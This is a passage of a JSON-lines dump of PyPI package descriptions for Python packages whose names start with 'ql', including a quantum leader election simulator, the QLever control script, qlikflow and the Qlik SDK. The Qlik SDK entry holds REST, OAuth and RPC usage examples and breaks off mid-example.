installedcurrent_qlep.draw_boxplot(simulate_file_name=current_qlep.get_simulate_file_name(),draw_directory=\"plots\")Test your proposed protocolimportqlep# numpyimportnumpyasnp# qiskitimportqiskit# override decoratorfromtyping_extensionsimportoverrideclassNQLEP(qlep.core.QuantumLeaderElectionProtocolwithPoS):r\"\"\"An example class for a dummy quantum leader election protocol\"\"\"def__init__(self,no_nodes:int,no_elections:int=1,quantum_data_provider:qlep.core.QuantumDataProvider=None,committee:qlep.core.Committee=None,)->None:super().__init__(election_type=qlep.core.ElectionType.NEWPROTOCOL,no_nodes=no_nodes,no_elections=no_elections,quantum_data_provider=quantum_data_provider,committee=committee)@overridedefget_quantum_circuits(self,measure:bool=True)->list[qiskit.QuantumCircuit]:return[NQLEPStateGenerator.get_quantum_circuits(no_nodes=self.quantum_no_nodes,measure=measure)]@overridedefget_leader_election_algorithm(self)->qlep.core.LeaderElectionAlgorithm:returnNQLEPLeaderElectionAlgorithm()@overridedefget_malicious_attacker(self)->qlep.core.MaliciousAttacker:returnNQLEPMaliciousAttacker()classNQLEPStateGenerator:@staticmethoddefget_quantum_circuits(no_nodes:int,measure:bool=True)->qiskit.QuantumCircuit:# the number of qubitsno_qubits=no_nodes# the qubits registerquantum_registers=qiskit.QuantumRegister(no_qubits,'q')ifmeasure:# the classic registersclassic_registers=qiskit.ClassicalRegister(no_qubits,'c')# the quantum circuit which use the qubits# and the classic bits registersquantum_circuit=qiskit.QuantumCircuit(quantum_registers,classic_registers)else:quantum_circuit=qiskit.QuantumCircuit(quantum_registers)# create the superposition for the first two 
qubitsquantum_circuit.h(quantum_registers[0])quantum_circuit.cx(quantum_registers[0],quantum_registers[1])quantum_circuit.x(quantum_registers[0])quantum_circuit.barrier()ifmeasure:quantum_circuit.measure(quantum_registers,classic_registers)returnquantum_circuitclassNQLEPLeaderElectionAlgorithm(qlep.core.LeaderElectionAlgorithm):def__init__(self)->None:super().__init__()@overridedefelect(self,data:np.ndarray)->int:match(data[0,0,0],data[0,0,1]):case(1,0):return0case(0,1):return1case_:return-1classNQLEPMaliciousAttacker(qlep.core.MaliciousAttacker):def__init__(self)->None:super().__init__()@overridedefattack(self,register_ids:np.ndarray,data:np.ndarray,malicious_ids:np.ndarray)->np.ndarray:# get the malicious nodesmalicious_nodes=[xforxinregister_idsifxinmalicious_ids]# if no malicious nodes under our control than return the given dataifnotmalicious_nodes:returndata# init return datamodified_data=np.copy(data)# verify if the first two nodes are maliciousmatch(register_ids[0]inmalicious_ids,register_ids[1]inmalicious_ids):case(True,False):modified_data[0,0,0]=1case(False,True):modified_data[0,0,1]=1case(True,True):modified_data[0,0,0]=1modified_data[0,0,1]=0case_:passreturnmodified_dataCreditsList of colaborators:Stefan-Dan CiocirlanDumitrel LoghinLicenseDistributed under the EUPL v1.2 License. SeeLICENSE.txtfor more information."} +{"package": "qless-py", "pacakge-description": "Redis-based queue management, with heartbeating, job tracking,\nstats, notifications, and a whole lot more."} +{"package": "qless-util", "pacakge-description": "Utilities for qless."} +{"package": "qless-with-throttles", "pacakge-description": "Fork of seomoz/qless-py with support for throttles."} +{"package": "qlet", "pacakge-description": "qletThis is an extension package based onflet, which provides a variety oflayoutsthat can auto-resize based on theirref_parent.Installationpipinstallqlet"} +{"package": "qlever", "pacakge-description": "QLever ControlThis is a very small repository. Its main contents is a scriptqleverthat can control everything that QLever does. The script is supposed to be very\neasy to use and pretty much self-explanatory as you use it. If you use docker, you\ndon't even have to download any QLever code (docker will pull anything it needs)\nand the script is all you need.Directory structureWe recommend that you have a directory \"qlever\" for all things QLever on your machine,\nwith subdirectories for the different components, in particular: \"qlever-control\" (this\nrepository), \"qlever-indices\" (with a subfolder for each of your datasets), and \"qlever-code\"\n(only needed if you don't want to use docker, but compile the binaries on your machine).QuickstartCreate an empty directory (preferably as a subdirectory of \"qlever-indices\", go there,\nand call theqleverscript once with its full path and a dot and a space preceding it,\nand the name of a preconfiguration as only argument. For example:. /path/to/qlever olympicsThis will create aQleverfilepreconfigured for the120 Years of Olympicsdataset, which is\na great dataset to get started because it's small. Other options are:scientists(another small test collection),dblp(larger),wikidata(very large),\nand more. 
If you leave out the argument, you get a defaultQleverfile, which you need\nto edit first to use for your own dataset (it should be self-explanatory, after you have\nplayed around with and looked at one of the preconfigured Qleverfiles).Now you can callqleverwithout path and without a dot and a space preceding it and\nwith one or more actions as argument. To see the set of avaiable actions, just use the\nautocompletion. When you are a first-timer, execute these commands one after the other\n(without the comments):qlever get-data # Download the dataset\nqlever index # Build a QLever index for your data\nqlever start # Start a QLever server using that index\nqlever example-query # Launch an example queryEach command will not only execute the respective action, but it will also show you\nthe exact command line it uses. That way you can learn, on the side, how QLever works\ninternally. If you just want to know the command used for a particular action, but\nnot execute it, you can append \"show\" like this:qlever index showYou can also perform a sequence of actions with a single call, for example:qlever stop remove-index index startThere are many more actions. The script supports autocompletion. Just type \"qlever \"\nand then TAB and you will get a list of all the available actions."} +{"package": "qlib", "pacakge-description": "Initial package Qlib"} +{"package": "qlibs", "pacakge-description": "Welcome to QLibsQLibs is a multipurpose library, suitable for making graphical applications and games.FeaturesThere are quite a lot of them!Resource system.Math: vectors and matrices.Wavefont OBJ loading and rendering.Window creation and widgets.Text rendering.Network packets and sockets.More to come.DocumentationSeehttps://intquant.github.io/qlibs/Also there are examples.InstallationUsepip install qlibs[full]to install all dependencies.pip install qlibswill install only MIT-licensed dependencies.--no-depsswitch can be used to ignore dependencies, most of library will still work."} +{"package": "qlibs-cyan", "pacakge-description": "QLibs CyanReimplements some qlibs modules in C. 
Those are preferred by qlibs over their python counterparts."}
{"package": "qlib-tool", "pacakge-description": "No description available on PyPI."}
{"package": "qlikconnect", "pacakge-description": "qlikconnectqlikconnect is a Python library used to interact with Qliksense. It uses the Qlik engine API to connect with Qliksense through websocket. 
This module can be use to do things like fetch qlik charts data, evaluate your expression through this and many more.InstallationInstallation is pretty straightforward usingpip:pip install qlikconnectExampleAfter installing the library, importSenseConnectclass as below:ForLocalhost Qliksense Desktop :from qlikconnect import SenseConnect\nsc = SenseConnect()For **Enterprise **, certificate details will be required:from qlikconnect import SenseConnect\nsc = SenseConnect(domain ='domain_name',\n\t\t\t\tport='port_number',\n\t\t\t\tuserdirectory='userdirectory',\n\t\t\t\tuserid='userid',\n\t\t\t\tcertPath='folder/path/of/certificates')Certificates also required named 'root.pem', 'client.pem' and 'client_key.pem' which can be exported from qmc.Also you can get the port(4747 by default), userdirectory and userid from qmc.Use CaseTo get the app details :sc.get_list_of_apps(appID)To get last refreshed timestamp of an app :sc.get_last_updated_status(appname)To evaluate an expression from an app :sc.evaluate_expression(appname, expression,e_o_d=0)To export the data from charts to excel :sc.export_data(appname, chartname)Requirement> websocket_client\n> python 3 (3.6 recommended)"} +{"package": "qlikEngineConnect", "pacakge-description": "qlik-engine-api-connectorWeb-socket connector for Qlik engine API."} +{"package": "qlikflow", "pacakge-description": "qlikflowThis module allows you to create simple Apache Airflow DAG files-constructors for QlikView, Qlik Sense and NPrinting.Information filesChangelog :https://github.com/bintocher/qlikflow/blob/main/CHANGELOG.mdManual(en) :https://github.com/bintocher/qlikflow/blob/main/doc/readme.mdThis readme :https://github.com/bintocher/qlikflow/blob/main/README.mdInstallpip3installqlikflowUpgradepip3installqlikflow-UCreate config-fileOpenconfig_generator.pywith your IDE editor, and set settings, save scriptThen run script to createconfig.jsonfilePut thisconfig.jsonfile on your Apache Airflow server in folder:AIRFLOW_HOME/config/Use in DAG-filesfromairflowimportDAGfromairflow.utils.datesimportdays_agofromqlikflowimportqlikflowfromdatetimeimportdatetimetasksDict={u'qliksense. Test task':{'Soft':'qs1','TaskId':'c5d80e71-f574-4655-8874-3a6e2aed6218','RandomStartDelay':10,},u'np100. run nprinting tasks':{'Soft':'np100','TaskId':['taskid1','taskid2','taskid3','taskid4',],'Dep':{u'qliksense. Test task',}}}default_args={'owner':'test','depends_on_past':False,}dag=DAG(dag_id='_my_test_dag',default_args=default_args,start_date=days_ago(1),schedule_interval='@daily',description='Default test dag',tags=['qliksense','testing'],catchup=False)airflowTasksDict={}qlikflow.create_tasks(tasksDict,airflowTasksDict,dag)This code convert into DAG like this:"} +{"package": "qlik-sdk", "pacakge-description": "Qlik SDKQlik's Python SDK allows you to leverage the APIs of Qlik Cloud platform from the comfort of python.qlik-sdk-pythonInstallGetting startedAuthentication optionsAPI keysChangelogContributingBugsFeaturesDevelopingExamplesapps_items.pyflask_oauth.pyimport_export.pyrpc basics example_custom_type.pyrpc basics lists app_object_list app_object_list.pyrpc basics lists field_list field_list.pyrpc basics lists variable_list variable_list.pyrpc data hypercubes pivot hypercube_pivot.pyrpc data hypercubes stacked hypercube_stacked.pyrpc data hypercubes straight hypercube_straight.pyrpc rpc.pyInstallpython3-mpipinstall--upgradeqlik-sdkGetting startedThe lowest supported python version is3.8.\nA good place to start is ourexamples. 
Take a look and learn how to authorize and use our REST and RPC clients to access the APIs. If you're in a real hurry, the essence of our examples is shown below.fromqlik_sdkimportAuth,AuthType,Configapi_key=\"\"base_url=\"\"# E.g. https://foo.qlikcloud.eu.comq=Qlik(config=Config(host=base_url,auth_type=AuthType.APIKey,api_key=api_key))user=q.users.get_me()print(\"Logged in as: \"+user.name)# For REST calls: auth.rest# For RPC calls: auth.rpcAuthentication optionsAPI keysAn API key is a token representing a user in your tenant. Anyone may interact with the platform programmatically using the API key. The token contains the user context, respecting the access control privileges the user has in your tenant. More info can be found onQlik Dev Portal.For a step-by-step guide on how to get an API key for your tenant, check thistutorial.OAuth2OAuth is a standard security protocol for authorization and delegation. It allows third party applications to access API resources without disclosing the end-user credentials.For a step-by-step guide on how to create an OAuth client for your tenant, checkCreating and managing OAuth clients# Authorization# Create auth objectconfig=Config(host='my-tenant.qlikcloud.com',auth_type=AuthType.OAuth2,client_id='',client_secret='',redirect_url='',scope='',)auth=Auth(config=config)# for login redirect to authorization uri for OAuth exchange token flow# which will call callback endpoint with credentialsredirect(auth.generate_authorization_url(),code=301)# on callback endpoint (redirectUri), exachange the creadentials with tokenauth.authorize(request.full_path)# fetch a resourceuser=auth.rest(path=\"/users/me\")# refreshing tokenauth.refresh_token()# deauthorizationauth.deauthorize()Examplesapps_items.pyimportosimportuuidfromdataclassesimportasdictfromdotenvimportdotenv_valuesfromqlik_sdkimport(AppAttributes,AppUpdateAttributes,AuthType,Config,CreateApp,Qlik,UpdateApp,)# get QCS_SERVER and QCS_API_KEY from .env file in the same folder as this scriptfile_dir=os.path.dirname(os.path.abspath(__file__))dotenv_path=os.path.join(file_dir,\".env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)config=Config(host=host,auth_type=AuthType.APIKey,api_key=api_key)q=Qlik(config=config)user=q.users.get_me()print(\"Logged in as: \"+user.name)deflog_req(req):print(\"request:\",req.method,req.url)returnreqdeflog_res(res):print(\"response:\",res.request.method,res.request.url,\"->\",res.status_code)returnresq.apps.auth.rest.interceptors[\"response\"].use(log_res)q.apps.auth.rest.interceptors[\"request\"].use(log_req)# The body parameter can be either an object or a dict# The recommended way is to use an object# create apps - 2 methods - dict body or obj body# create app - dict bodyrandom_app_name1=str(uuid.uuid1())app_dict_body=q.apps.create(data={\"attributes\":{\"name\":random_app_name1}})app_dict_body.delete()# create app - obj bodyrandom_app_name2=str(uuid.uuid1())app=q.apps.create(data=CreateApp(attributes=AppAttributes(name=random_app_name2,description=\"desc\",spaceId=\"\")),)# Convert app object to dictapp_asdict=asdict(app)# set load script, reload and evaluate expressionwithapp.open():script=\"Load RecNo() as N autogenerate(200);\"app.set_script(script)app.do_reload()eval=app.evaluate(\"SUM([N])\")print(eval)# Set attribute# body: dictapp.set(data={\"attributes\":{\"name\":\"set-name-dict\"}})# body: 
objupdate_name=str(uuid.uuid1())app.set(UpdateApp(attributes=AppUpdateAttributes(description=\"new description\",name=update_name)))# items list - query param nameitems0=q.items.get_items(name=update_name)app.delete()items1=q.items.get_items(name=update_name)# get_items using an app name query param, result-length before and after deleteprint(f\"found items matching:{update_name}, before and after delete:{len(items0)},{len(items1)}\")items=q.items.get_items()first_100_item_names=[]foriteminitems.pagination:iflen(first_100_item_names)<100:first_100_item_names.append(item.name)else:breakflask_oauth.pyimportosimportrandomfromdotenvimportdotenv_valuesfromflaskimportFlask,redirect,render_template,request# src. should be removed when example is publicfromsrc.qlik_sdkimportAuth,AuthType,Config# get QCS_SERVER and QCS_API_KEY from .env file in the same folder as this scriptfile_dir=os.path.dirname(os.path.abspath(__file__))dotenv_path=os.path.join(file_dir,\".env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER_OAUTH\",False)client_id=env_values.get(\"CLIENT_ID_WEB\",False)client_secret=env_values.get(\"CLIENT_SECRET_WEB\",False)redirect_url=\"http://localhost:3000/login/callback\"config=Config(host=host,auth_type=AuthType.OAuth2,client_id=client_id,client_secret=client_secret,redirect_url=redirect_url,scope=[\"offline_access\"],)auth=Auth(config=config)app=Flask(__name__)template_data={\"is_logged_in\":False,\"user\":\"\",\"eval_result\":\"\"}@app.route(\"/\")defindex():try:user=auth.rest(path=\"/users/me\")user=user.json()template_data[\"is_logged_in\"]=Truetemplate_data[\"user\"]=f\"User:{user['name']}is logged in\"exceptException:template_data[\"is_logged_in\"]=Falsetemplate_data[\"user\"]=\"\"returnrender_template(\"index.html\",template_data=template_data)@app.route(\"/login\")deflogin():returnredirect(auth.generate_authorization_url(),code=301)@app.route(\"/login/callback\")defcallback():auth.authorize(request.full_path)returnredirect(\"/\",code=301)@app.route(\"/logout\")deflogout():auth.deauthorize()template_data[\"is_logged_in\"]=Falsetemplate_data[\"user\"]=\"\"returnredirect(\"/\",code=301)@app.route(\"/refresh\")defrefresh():auth.refresh_token()returnredirect(\"/\",code=301)@app.route(\"/websocket\")defwebsocket():random_id=random.randint(1,1000)app_id=f\"SessionApp_{random_id}\"try:# Open a websocket for a session app using RpcClientrpc_session=auth.rpc(app_id)try:rpc_session.open()app_handle=(rpc_session.send(\"GetActiveDoc\",-1))[\"qReturn\"][\"qHandle\"]rpc_session.send(\"SetScript\",app_handle,\"Load RecNo() as N autogenerate(10)\",)rpc_session.send(\"DoReload\",app_handle)eval_result=rpc_session.send(\"Evaluate\",app_handle,\"SUM([N])\")template_data[\"is_logged_in\"]=Truetemplate_data[\"eval_result\"]=eval_result[\"qReturn\"]exceptExceptionaserr:print(f\"rpc_session error occured:{err}\")returnredirect(\"/\",code=500)finally:rpc_session.close()print(\"rpc_connection closed\")exceptExceptionaserr:print(f\"error occured while setting up auth:{err}\")returnredirect(\"/\",code=500)returnredirect(\"/\",code=301)if__name__==\"__main__\":app.run(host=\"localhost\",port=3000,debug=True)import_export.pyimportjsonimportosimportshutilimportuuidfromdotenvimportdotenv_valuesfromqlik_sdkimportAuthType,Config,Qlik# get QCS_SERVER and QCS_API_KEY from .env file in the same folder as this 
scriptfile_dir=os.path.dirname(os.path.abspath(__file__))dotenv_path=os.path.join(file_dir,\".env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)withopen(os.path.join(file_dir,\"sheetListDef.json\"))asjson_file:sheet_list_def=json.load(json_file)config=Config(host=host,auth_type=AuthType.APIKey,api_key=api_key)q=Qlik(config=config)# Print user nameuser=q.users.get_me()print(\"Logged in as: \"+user.name)# Create a managed spacespace_name=\"publish-apps-sdk-test\"+str(uuid.uuid1())shared_space=q.spaces.create({\"name\":space_name,\"description\":\"space used for testing\",\"type\":\"managed\",})print(f\"created space with name{space_name}and id{shared_space.id}\")# Import app - (app with multiple sheets)qvf_file=os.path.join(file_dir,\"two-sheets.qvf\")app_name=\"import-test\"+str(uuid.uuid1())withopen(qvf_file,\"rb\")asqvf_data:imported_app=q.apps.import_app(data=qvf_data,name=app_name)print(f\"imported app with name{app_name}and id{imported_app.attributes.id}\")# Publish each sheetprint(f\"open app with id{imported_app.attributes.id}and publish all sheets\")withimported_app.open():session_obj=imported_app.create_session_object(sheet_list_def)sheet_list_layout=session_obj.get_layout()sheet_id_list=[q.qInfo.qIdforqinsheet_list_layout.qAppObjectList.qItems]forsheet_idinsheet_id_list:print(f\"publishing sheet with id{sheet_id}\")sheet_obj=imported_app.get_object(sheet_id)sheet_obj.publish()# Publish the appprint(f\"publish app with id{imported_app.attributes.id}to space with id{shared_space.id}\")published_app=imported_app.publish({\"spaceId\":shared_space.id})print(f\"published app id{published_app.attributes.id}\")# export applocal_filename=f\"exported{uuid.uuid1()}.qvf\"temp_contents_url=imported_app.export()# download app streaming to filewithq.auth.rest(path=temp_contents_url,method=\"get\",stream=True)asr:withopen(local_filename,\"wb\")asf:shutil.copyfileobj(r.raw,f)print(f\"Exported{published_app.attributes.name}to{local_filename}\")ext_file_path=env_values.get(\"EXTENSION_ZIP_PATH\",False)# Upload extensionwithopen(ext_file_path,\"rb\")asext_file:ext=q.extensions.create(file=ext_file)# TODO# set properties - change sheet name# upload theme# apply themes on the app# import datafiles# Delete everything createdprint(\"cleaning up\")ext.delete()imported_app.delete()published_app.delete()shared_space.delete()os.remove(local_filename)rpc basics example_custom_type.pyimportosimportsysimportuuidfromdotenvimportdotenv_valuesfromqlik_sdkimportApps,Auth,AuthType,Config# get QCS_SERVER and QCS_API_KEY from .env file in the same folder as this scriptfile_dir=os.path.dirname(os.path.abspath(__file__))dotenv_path=os.path.join(file_dir,\"../../.env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)config=Config(host=host,auth_type=AuthType.APIKey,api_key=api_key)auth=Auth(config)apps=Apps(config)session_app_id=\"SessionApp_\"+str(uuid.uuid1())session_app=apps.create_session_app(session_app_id)withsession_app.open():# create a generic object of a custom typeproperties={\"qInfo\":{\"qType\":\"custom-object\"},}obj=session_app.create_session_object(properties)# set a custom property i.e. 
a property not defined in GenericObjectPropertiesproperties[\"CustomProperty\"]=\"custom-property-value\"obj.set_properties(properties)# fetch the properties and validate that the custom property is returnednew_props=obj.get_properties()ifnew_props.qInfo.qType!=\"custom-object\":sys.exit(1)ifnew_props.CustomProperty!=\"custom-property-value\":sys.exit(1)rpc basics lists app_object_list app_object_list.pyimportosimportsysimportuuidfromdotenvimportdotenv_valuesfromsrc.qlik_sdkimportApps,AuthType,Config,GenericObjectPropertiesfromsrc.qlik_sdk.apis.AppsimportJsonObjectfromsrc.qlik_sdk.apis.QiximportAppObjectListDef,NxInfoclassCustomObjectProperties(GenericObjectProperties):meta:dict[str,str]=Nonedeflist_app_objects():# get QCS_SERVER and QCS_API_KEY from .env file in the same folder as this scriptfile_dir=os.path.abspath(\"\")dotenv_path=os.path.join(file_dir+\"/examples\",\".env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)config=Config(host=host,auth_type=AuthType.APIKey,api_key=api_key)apps=Apps(config)session_app_id=\"SessionApp_\"+str(uuid.uuid1())session_app=apps.create_session_app(session_app_id)withsession_app.open():foriinrange(10):properties=CustomObjectProperties(qInfo=NxInfo(qType=\"my-object\"),meta=dict({\"title\":f\"my-object-{i}\"}),)session_app.create_object(properties)list_properties=GenericObjectProperties(qInfo=NxInfo(qType=\"my-list\"),qAppObjectListDef=AppObjectListDef(qType=\"my-object\",qData=JsonObject(title=\"/meta/title\")),)try:object=session_app.create_object(qProp=list_properties)layout=object.get_layout()returnlayout.qAppObjectList.qItems.__len__()exceptValueErrorase:print(e.__class__)iflist_app_objects()!=10:print(\"Error in number of objects .....\")sys.exit(1)rpc basics lists field_list field_list.pyimportosimportsysimportuuidfromdotenvimportdotenv_valuesfromsrc.qlik_sdkimportApps,AuthType,Config,GenericObjectPropertiesfromsrc.qlik_sdk.apis.QiximportFieldListDef,NxInfoscript=\"\"\"TempTable:LoadRecNo() as Field1,Rand() as Field2,Rand() as Field3AutoGenerate 100\"\"\"# get QCS_SERVER and QCS_API_KEY from .env file in the same folder as this scriptfile_dir=os.path.abspath(\"\")dotenv_path=os.path.join(file_dir+\"/examples\",\".env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)config=Config(host=host,auth_type=AuthType.APIKey,api_key=api_key)apps=Apps(config)session_app_id=\"SessionApp_\"+str(uuid.uuid1())session_app=apps.create_session_app(session_app_id)withsession_app.open():# Load in some data into the session document:session_app.set_script(script)session_app.do_reload()# Create a field list using qFieldListDef and list all fields available in the document.object=session_app.create_session_object(GenericObjectProperties(qInfo=NxInfo(qType=\"my-field-list\"),qFieldListDef=FieldListDef(),))layout=object.get_layout()print(\"field-list \",layout.qFieldList.qItems)items=layout.qFieldList.qItemsif(items.__len__()!=3oritems[0].qName!=\"Field1\"oritems[1].qName!=\"Field2\"oritems[2].qName!=\"Field3\"):print(\"Error generated qFieldsLists ......\")sys.exit(1)rpc basics lists variable_list 
variable_list.pyimportosimportsysimportuuidfromdotenvimportdotenv_valuesfromsrc.qlik_sdkimportApps,AuthType,Config,GenericObjectPropertiesfromsrc.qlik_sdk.apis.AppsimportJsonObjectfromsrc.qlik_sdk.apis.QiximportNxInfo,VariableListDefscript=\"\"\"TempTable:LoadRecNo() as Field1,Rand() as Field2,Rand() as Field3AutoGenerate 100\"\"\"# get QCS_SERVER and QCS_API_KEY from .env file in the same folder as this scriptfile_dir=os.path.abspath(\"\")dotenv_path=os.path.join(file_dir+\"/examples\",\".env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)config=Config(host=host,auth_type=AuthType.APIKey,api_key=api_key)apps=Apps(config)session_app_id=\"SessionApp_\"+str(uuid.uuid1())session_app=apps.create_session_app(session_app_id)withsession_app.open():# Load in some data into the session document:session_app.set_script(script)session_app.do_reload()session_app.create_variable_ex(GenericObjectProperties(qInfo=NxInfo(qType=\"variable\"),qComment=\"sample comment\",qDefinition=\"=Count(Field1)\",qName=\"vVariableName\",))variable=session_app.get_variable_by_id(\"vVariableName\")object=session_app.create_session_object(GenericObjectProperties(qInfo=NxInfo(qType=\"VariableList\"),qVariableListDef=VariableListDef(qType=\"variable\",qData=JsonObject(tags=\"/tags\"),qShowSession=True,qShowConfig=True,qShowReserved=True,),))layout=object.get_layout()layout.qVariableList.qItemsprint(\"variable-list: \",layout.qVariableList.qItems)foriteminlayout.qVariableList.qItems:ifitem.qName==\"vVariableName\":sys.exit(0)sys.exit(1)rpc data hypercubes pivot hypercube_pivot.pyimportosimportsysimportuuidfromdotenvimportdotenv_valuesfromsrc.qlik_sdkimportApps,AuthType,Configfromsrc.qlik_sdk.apis.Qiximport(GenericObjectProperties,HyperCubeDef,NxDimension,NxInfo,NxInlineDimensionDef,NxInlineMeasureDef,NxMeasure,NxPage,NxSelectionCell,)script=\"\"\"TempTable:LoadRecNo() as ID,RecNo()+1 as ID2,Rand() as ValueAutoGenerate 100\"\"\"# get QCS_SERVER and QCS_API_KEY from .env filefile_dir=os.path.dirname(os.path.abspath(__file__))dotenv_path=os.path.join(file_dir,\"../../../../.env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)config=Config(host=host,auth_type=AuthType.APIKey,api_key=api_key)apps=Apps(config)session_app_id=\"SessionApp_\"+str(uuid.uuid1())session_app=apps.create_session_app(session_app_id)withsession_app.open():# Load in some data into the session document:session_app.set_script(script)session_app.do_reload()obj=session_app.create_object(GenericObjectProperties(qInfo=NxInfo(qType=\"my-pivot-hypercube\"),qHyperCubeDef=HyperCubeDef(qDimensions=[NxDimension(qDef=NxInlineDimensionDef(qFieldDefs=[\"ID\"])),NxDimension(qDef=NxInlineDimensionDef(qFieldDefs=[\"ID2\"])),],qMeasures=[NxMeasure(qDef=NxInlineMeasureDef(qDef=\"Sum(Value)\",))],qMode=\"EQ_DATA_MODE_PIVOT\",qAlwaysFullyExpanded=True,),))data=obj.get_hyper_cube_pivot_data(\"/qHyperCubeDef\",[NxPage(qHeight=5,qLeft=0,qTop=0,qWidth=2,)],)print(\"HyperCude object data: \",data)obj.select_pivot_cells(\"/qHyperCubeDef\",[NxSelectionCell(qType=\"D\",qRow=1,qCol=0)],False,False)data=obj.get_hyper_cube_pivot_data(\"/qHyperCubeDef\",[NxPage(qHeight=5,qLeft=0,qTop=0,qWidth=2,)],)print(\"Hypercube data pages after selection: 
\",data)ifnot(len(data)==1andlen(data[0].qData)==1andlen(data[0].qTop)==1anddata[0].qTop[0].qText==\"Sum(Value)\"):print(\"Error in generated stack pages ......\")sys.exit(1)rpc data hypercubes stacked hypercube_stacked.pyimportosimportsysimportuuidfromdotenvimportdotenv_valuesfromsrc.qlik_sdkimportApps,AuthType,Configfromsrc.qlik_sdk.apis.Qiximport(GenericObjectProperties,HyperCubeDef,NxDimension,NxInfo,NxInlineDimensionDef,NxInlineMeasureDef,NxMeasure,NxPage,NxSelectionCell,)script=\"\"\"TempTable:LoadRecNo() as ID,RecNo()+1 as ID2,Rand() as ValueAutoGenerate 100\"\"\"# get QCS_SERVER and QCS_API_KEY from .env filefile_dir=os.path.dirname(os.path.abspath(__file__))dotenv_path=os.path.join(file_dir,\"../../../../.env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)config=Config(host=host,auth_type=AuthType.APIKey,api_key=api_key)apps=Apps(config)session_app_id=\"SessionApp_\"+str(uuid.uuid1())session_app=apps.create_session_app(session_app_id)withsession_app.open():# Load in some data into the session document:session_app.set_script(script)session_app.do_reload()obj=session_app.create_object(GenericObjectProperties(qInfo=NxInfo(qType=\"my-stacked-hypercube\",),qHyperCubeDef=HyperCubeDef(qDimensions=[NxDimension(qDef=NxInlineDimensionDef(qFieldDefs=[\"ID\"])),NxDimension(qDef=NxInlineDimensionDef(qFieldDefs=[\"ID2\"])),],qMeasures=[NxMeasure(qDef=NxInlineMeasureDef(qDef=\"Sum(Value)\",))],qMode=\"EQ_DATA_MODE_PIVOT_STACK\",qAlwaysFullyExpanded=True,),))data=obj.get_hyper_cube_stack_data(\"/qHyperCubeDef\",[NxPage(qHeight=5,qLeft=0,qTop=0,qWidth=2,)],10000,)print(\"HyperCude stack data: \",data)obj.select_pivot_cells(\"/qHyperCubeDef\",[NxSelectionCell(qType=\"D\",qRow=1,qCol=0,)],False,False,)data=obj.get_hyper_cube_stack_data(\"/qHyperCubeDef\",[NxPage(qHeight=5,qLeft=0,qTop=0,qWidth=2,)],10000,)print(\"Hypercube stack data pages after selection: \",data)ifnot(len(data)==1andlen(data[0].qData)==1andlen(data[0].qData[0].qSubNodes)==1andlen(data[0].qData[0].qSubNodes[0].qSubNodes)==1):print(\"Error in generated stack pages ......\")sys.exit(1)rpc data hypercubes straight hypercube_straight.pyimportosimportsysimportuuidfromdotenvimportdotenv_valuesfromsrc.qlik_sdkimportApps,AuthType,Configfromsrc.qlik_sdk.apis.Qiximport(GenericObjectProperties,HyperCubeDef,NxDimension,NxInfo,NxInlineDimensionDef,NxInlineMeasureDef,NxMeasure,NxPage,)script=\"\"\"TempTable:LoadRecNo() as ID,Rand() as ValueAutoGenerate 100\"\"\"# get QCS_SERVER and QCS_API_KEY from .env filefile_dir=os.path.dirname(os.path.abspath(__file__))dotenv_path=os.path.join(file_dir,\"../../../../.env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)config=Config(host=host,auth_type=AuthType.APIKey,api_key=api_key)apps=Apps(config)session_app_id=\"SessionApp_\"+str(uuid.uuid1())session_app=apps.create_session_app(session_app_id)withsession_app.open():# Load in some data into the session 
